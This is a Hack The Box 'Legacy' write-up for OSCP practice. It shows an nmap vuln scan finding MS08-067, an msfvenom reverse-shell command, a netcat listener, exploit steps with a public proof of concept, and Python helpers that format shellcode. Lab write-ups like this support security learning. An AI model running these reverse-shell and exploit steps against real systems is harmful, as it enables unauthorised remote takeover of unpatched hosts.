OSCP PREPARATIONS – HTB Legacy

Legacy is a retired Hack The Box machine running Windows. The goal is to obtain the user and root flags from it.
We start with an nmap scan to identify the target's open ports and services.
Classic Scan

Full Port Scan

The port scan shows three open ports: 135/tcp (msrpc, Microsoft Windows RPC), 139/tcp (netbios-ssn, Microsoft Windows netbios-ssn) and 445/tcp (microsoft-ds), with the SMB banner identifying the host as Windows XP.
Windows XP is long out of support and exposes SMBv1 on 445/tcp, so old, well-known SMB vulnerabilities are likely. Let's run nmap's vuln script category against the SMB port and see which one applies:
nmap -T5 10.10.10.4 -Pn -p 445 --script vuln -vvvv -oN vulnscan.txt
-Pn skips host discovery (Windows hosts often drop ICMP), --script vuln runs every NSE script in the vuln category, and -oN saves the normal-format output to vulnscan.txt so the result can be re-read later. Note that -T5 is aggressive and can lose results over a flaky VPN link; -T4 is the safer choice if the scan comes back empty.

The smb-vuln-ms08-067 script reports the host as VULNERABLE. MS08-067 (CVE-2008-4250) is a stack buffer overflow in the Server service's path-canonicalisation code (NetAPI32), reachable over SMB/RPC without authentication. Next we look for a public proof-of-concept exploit for it.
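To turn the saved vulnscan.txt into a yes/no answer without reading the NSE tree by eye, here is an added example (not from the original post) that parses nmap's normal-output (-oN) format and lists which smb-vuln-* scripts reported State: VULNERABLE, together with the CVE IDs they cite. The embedded scan text is constructed in nmap's layout for illustration, not a capture from the box, and the descriptive text inside it is abbreviated with "...".

```python
"""Pull the smb-vuln-* verdicts out of an nmap -oN (normal output) file.

Added example, not part of the original post. SAMPLE_VULNSCAN is constructed
in nmap's normal-output layout for illustration; it is not a capture from
the Legacy box, and the description text is abbreviated with "..."."""
import re
from collections import OrderedDict

SAMPLE_VULNSCAN = """\
Nmap scan report for 10.10.10.4
Host is up (0.060s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows ... allows remote
|           attackers to execute arbitrary code via a crafted RPC request ...
|     Disclosure date: 2008-10-23
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
"""

# A script header is "| name: ..." or "|_name: ..." (name right after the
# bar); nested output lines keep the bar but are indented further.
_SCRIPT_HDR = re.compile(r"^\|[_ ]([\w-]+):\s*(.*)$")
_CVE_ID = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_smb_vuln(nmap_normal_output):
    """Return an ordered {script_name: {"state": ..., "cves": [...]}} map
    covering every smb-vuln-* script in the host script results."""
    blocks = OrderedDict()
    current = None
    for line in nmap_normal_output.splitlines():
        m = _SCRIPT_HDR.match(line)
        if m:
            name, rest = m.group(1), m.group(2).strip()
            if name.startswith("smb-vuln-"):
                current = blocks[name] = ([rest] if rest else [])
            else:
                current = None  # some other NSE script; ignore its block
            continue
        if current is not None and line.startswith("|"):
            # Strip the NSE tree decoration ("|", "|_") and indentation.
            current.append(line.lstrip("|_ ").strip())
        else:
            current = None  # a blank line or a new section ends the block

    results = OrderedDict()
    for name, lines in blocks.items():
        body = " ".join(lines)
        if "State: VULNERABLE" in body:
            state = "VULNERABLE"
        elif body.startswith("ERROR"):
            state = "ERROR"  # the script could not run; that is not a verdict
        elif body.startswith("false"):
            state = "NOT VULNERABLE"
        else:
            state = "UNKNOWN"
        results[name] = {"state": state,
                         "cves": sorted(set(_CVE_ID.findall(body)))}
    return results


def vulnerable_scripts(nmap_normal_output):
    """Names of the smb-vuln-* scripts that reported State: VULNERABLE."""
    return [name for name, r in parse_smb_vuln(nmap_normal_output).items()
            if r["state"] == "VULNERABLE"]


if __name__ == "__main__":
    for name, r in parse_smb_vuln(SAMPLE_VULNSCAN).items():
        print(f"{name}: {r['state']} {' '.join(r['cves'])}")
```

An ERROR line is deliberately kept apart from NOT VULNERABLE: a script that failed to execute (for example because the SMB session was refused) tells you nothing about the host, and treating it as a clean result is how vulnerable services get missed.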

Let's look at the first GitHub repository in the search results.

We came across https://github.com/andyacer/ms08_067, whose README explains the usage clearly. I followed its instructions,
in order:
1- First clone the repository with git:
git clone https://github.com/andyacer/ms08_067/
2- Then install the Impacket tools, since the exploit depends on them (the README pins the impacket_0_9_17 branch; both that branch and the exploit itself are Python 2 code, so use the Python 2 pip):
git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
cd impacket
pip install .
3- Generate the shellcode with msfvenom, excluding the bad characters the exploit cannot carry. LHOST must be your own VPN (tun0) address and LPORT the port you will listen on:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4747 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x5f\x2f\x2e\x40" -f c -a x86 --platform Windows
4- Paste the generated shellcode into the Python exploit file in place of the shellcode string it ships with.
5- Start a netcat listener on the port given to msfvenom (4747).
6- Run the Python exploit against the target. The script takes the target IP, an OS/service-pack option number and the port as arguments; the option must match the target's Windows version and service pack, otherwise the return address is wrong and the Server service crashes instead of running the shellcode.
After the exploit ran, the listener received a shell.
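Step 4 is where most failed attempts originate: the C array msfvenom prints has to be transcribed into the Python string the exploit script holds, and one stray bad character or a pasted non-shellcode line breaks the exploit silently. The following is an added example, not code from the post or from the andyacer/ms08_067 repository, that converts msfvenom -f c output into bytes, checks them against the -b bad-character list from the command above, and re-emits them as a multi-line Python string literal. The sample bytes are a constructed stand-in for real shellcode, and the "shellcode = (...)" layout it prints is an assumption about how the exploit stores it, so adjust to whatever the script actually uses.

```python
"""Turn msfvenom's `-f c` output into the Python string literal that the
ms08_067 exploit script carries, and verify no bad character survived.

Added example, not code from the original post or the andyacer/ms08_067
repository. SAMPLE_MSFVENOM_C is a constructed stand-in for real shellcode
(same layout, meaningless bytes), and the multi-line "shellcode = (...)"
layout produced below is an assumption about how the script stores it."""
import re

# The -b list from the post's msfvenom command (the duplicated \x5f dropped).
BADCHARS = b"\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"

# Constructed: what `msfvenom ... -f c` prints, minus a real payload.
SAMPLE_MSFVENOM_C = r'''
unsigned char buf[] = 
"\xda\xc1\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\x31\x43\x17\x03\x43"
"\x17\x83\xa7\x01\xfc\xe2\x5e\xb2\x8d\xf7\x6b\xd8";
'''

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_msfvenom_c(text):
    """Collect every \\xNN escape from the C array into a bytes object."""
    pairs = _HEX_ESCAPE.findall(text)
    if not pairs:
        raise ValueError("no \\xNN escapes found; is this `-f c` output?")
    return bytes(int(h, 16) for h in pairs)


def find_badchars(shellcode, badchars=BADCHARS):
    """(offset, value) for each byte of shellcode that is in badchars.
    An empty list means the encoder honoured -b; anything else gets
    mangled on the way in and the shell never connects back."""
    return [(i, b) for i, b in enumerate(shellcode) if b in badchars]


def to_python_literal(shellcode, width=16):
    """Render shellcode as adjacent "\\x.." string literals, `width`
    bytes per line, ready to paste into the exploit's shellcode block."""
    rows = []
    for i in range(0, len(shellcode), width):
        chunk = shellcode[i:i + width]
        rows.append('"' + "".join("\\x%02x" % b for b in chunk) + '"')
    return "(\n" + "\n".join(rows) + "\n)"


if __name__ == "__main__":
    sc = parse_msfvenom_c(SAMPLE_MSFVENOM_C)
    bad = find_badchars(sc)
    if bad:
        raise SystemExit("bad characters at %r; regenerate with -b" % bad)
    print("shellcode = " + to_python_literal(sc))
    print("# %d bytes" % len(sc))
```

Run it with the real msfvenom output saved to a file and fed to parse_msfvenom_c; the byte count it prints is worth comparing with the "Payload size" line msfvenom reports, since a mismatch means a line was lost in the copy.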

From that shell, which runs as SYSTEM because the exploited Server service does, we read both the user and the root flags.
